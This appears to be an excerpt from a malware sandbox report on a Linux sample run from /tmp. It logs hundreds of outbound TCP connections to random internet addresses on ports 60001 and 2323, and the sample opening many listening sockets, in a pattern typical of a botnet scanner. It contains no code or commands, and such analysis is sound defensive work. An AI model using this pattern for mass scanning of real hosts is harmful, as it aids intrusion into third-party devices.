      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.153.116.82:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.148.162.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.188.254.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.220.131.23:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.29.29.210:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 116.147.108.221:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.236.239.21:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.195.123.25:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 18.249.236.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 58.4.23.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.187.69.75:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 119.214.118.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.123.180.81:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.78.215.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.213.218.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.126.250.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 147.50.105.199:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.150.65.9:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 148.228.161.126:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 27.32.215.162:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 37.239.204.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 161.97.43.225:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.199.215.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 150.63.199.109:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 168.11.12.155:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 149.239.3.53:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.122.76.94:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 38.99.67.158:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.105.4.244:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.39.96.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.236.246.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 81.172.155.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.9.31.137:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 92.1.100.128:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.160.51.232:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.192.24.250:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.239.205.161:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.167.240.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 45.165.130.46:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.183.190.59:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 118.3.15.34:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 118.76.230.19:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 120.150.86.59:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 92.128.222.131:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 84.23.158.57:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.173.198.67:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 137.208.232.105:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 84.150.200.172:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.136.13.179:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.150.216.100:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 93.14.187.75:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.106.109.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.127.175.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.254.105.222:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 219.56.255.156:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 171.46.46.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.219.32.141:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.231.15.33:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 93.28.50.2:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.78.95.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.153.231.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.24.78.21:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.200.207.46:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.180.79.162:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.111.12.24:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.34.43.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.22.98.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.63.48.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 169.158.93.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 8.36.37.247:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.181.134.183:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.191.102.88:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.78.233.122:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 143.153.186.112:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.71.213.178:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 104.100.153.152:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 105.231.231.214:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 133.40.139.148:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.208.86.201:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.169.154.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 24.24.142.230:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.14.41.34:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.183.232.18:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.243.57.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 50.35.92.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.119.27.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.138.147.184:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 147.20.20.62:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.106.147.75:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.125.161.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.223.181.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.135.9.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.121.143.16:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.38.250.166:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.23.74.37:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 27.247.87.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.250.224.179:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.148.171.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.145.9.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 132.94.65.114:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.221.90.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 32.189.16.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.244.217.176:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 17.33.171.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 175.154.155.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.78.2.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.202.126.27:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.195.99.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 24.112.230.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 153.6.46.129:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 160.70.14.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 218.20.41.147:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.68.140.241:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.19.118.155:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.222.43.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.21.205.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.80.241.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 63.131.116.62:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.198.161.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.155.190.102:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.108.176.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 69.9.26.68:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.196.155.113:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.234.98.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.147.247.207:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.255.43.4:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 135.213.173.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 210.202.218.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 41.46.37.106:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.228.89.41:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.90.249.17:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.3.41.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 79.53.105.84:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 160.153.139.124:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.214.6.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 50.239.238.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.241.214.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.247.65.145:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.17.183.125:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.218.220.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 143.197.76.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.29.15.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.187.126.42:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.41.6.181:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.186.199.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.206.13.243:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.131.36.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.154.225.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.216.116.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 203.188.120.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 40.232.237.164:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 100.235.237.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.120.15.101:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.46.251.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 32.167.229.147:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 170.164.55.195:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.29.52.121:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.135.128.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.55.18.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.195.149.141:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 105.124.39.148:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 158.218.110.103:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.210.145.229:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.221.92.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 23.67.190.152:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 125.246.65.242:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 83.205.81.248:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 167.165.177.98:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 31.141.132.247:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 125.121.0.237:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 132.234.2.150:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 141.178.238.177:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 203.98.221.137:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 73.142.96.208:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 159.28.12.71:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 48.193.25.197:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 35.57.21.190:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 99.252.13.187:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 66.129.239.80:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 104.202.221.102:2323
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.38.175.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 156.66.213.74:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.58.252.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.137.108.86:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.221.21.232:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.247.207.73:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.134.185.30:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.137.246.203:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 78.58.51.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.93.105.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.157.228.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.135.133.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 137.207.119.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 86.243.116.171:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.105.176.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.184.165.49:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 90.163.46.26:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.213.177.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 213.179.150.216:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.40.223.54:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.254.93.247:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.124.5.40:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.123.110.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 191.7.49.149:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 204.64.24.113:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.13.74.206:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 104.238.86.213:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.137.224.126:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.104.26.249:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.73.137.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.132.15.65:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.113.249.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.221.204.12:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 198.36.53.24:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.63.45.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.160.21.251:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.86.128.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.147.108.208:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 93.136.97.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.136.152.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.184.15.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.249.189.191:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 177.253.251.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.64.88.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.171.230.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.98.45.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 82.121.57.163:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.120.150.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.12.82.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.210.165.73:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.239.139.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 52.179.164.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 102.58.179.252:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.74.243.78:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 62.252.156.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.10.130.133:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 166.208.236.225:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.134.96.46:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.127.214.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.143.13.216:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.124.154.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.77.127.138:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.245.72.172:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.201.118.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.149.154.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.182.75.240:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.97.128.205:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.53.154.192:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.227.22.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.91.13.82:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 188.224.212.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.106.24.29:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.226.36.193:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 98.65.173.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.28.144.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 35.141.50.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 63.215.206.249:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.187.51.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.133.34.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.204.60.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.1.231.123:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.166.193.173:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.40.15.57:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.115.230.227:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 79.46.235.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 152.9.42.191:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 202.176.18.228:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 89.20.94.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.93.88.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 114.118.71.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.39.119.212:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.131.10.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 196.166.233.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.8.98.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.144.74.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 189.207.112.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.148.169.200:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.228.107.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.206.138.142:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 124.72.192.165:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.78.105.134:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 205.158.34.228:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.129.194.221:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 145.245.200.76:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.161.82.136:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.169.84.124:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.249.178.193:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.131.72.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.143.159.209:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.251.10.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.89.31.139:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.17.125.5:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.72.207.244:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.240.53.251:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.216.18.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.223.189.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.17.62.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 136.169.196.47:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.46.102.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.134.192.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.243.134.83:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.194.90.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 34.123.191.202:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 18.210.153.204:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.24.70.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.247.211.146:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.72.97.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 126.182.52.69:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 48.83.247.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.92.220.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 98.197.250.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 157.186.91.239:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 119.147.83.81:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 37.102.243.211:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 42.226.17.22:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.149.234.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 84.196.114.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 184.185.106.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.101.99.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.63.26.220:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 125.87.12.236:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.240.206.207:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.32.9.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 166.94.124.174:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.200.1.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.189.233.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.66.220.194:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 38.142.127.80:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 165.65.125.61:60001
      Source: /tmp/SLdtSSVlj2 (PID: 5267)Socket: 127.0.0.1::43829
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::0
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8000
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::9000
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8080
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8081
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::53413
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::52869
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::37215
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::81
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8089
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8088
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8083
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::443
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::4444
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::8001
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::49152
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::40960
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::1024
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::1337
      Source: /tmp/SLdtSSVlj2 (PID: 5269)Socket: 0.0.0.0::420
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::23
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::0
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::80
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::60001
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8000
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::9000
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8080
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8081
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::53413
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::52869
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::37215
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::81
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8089
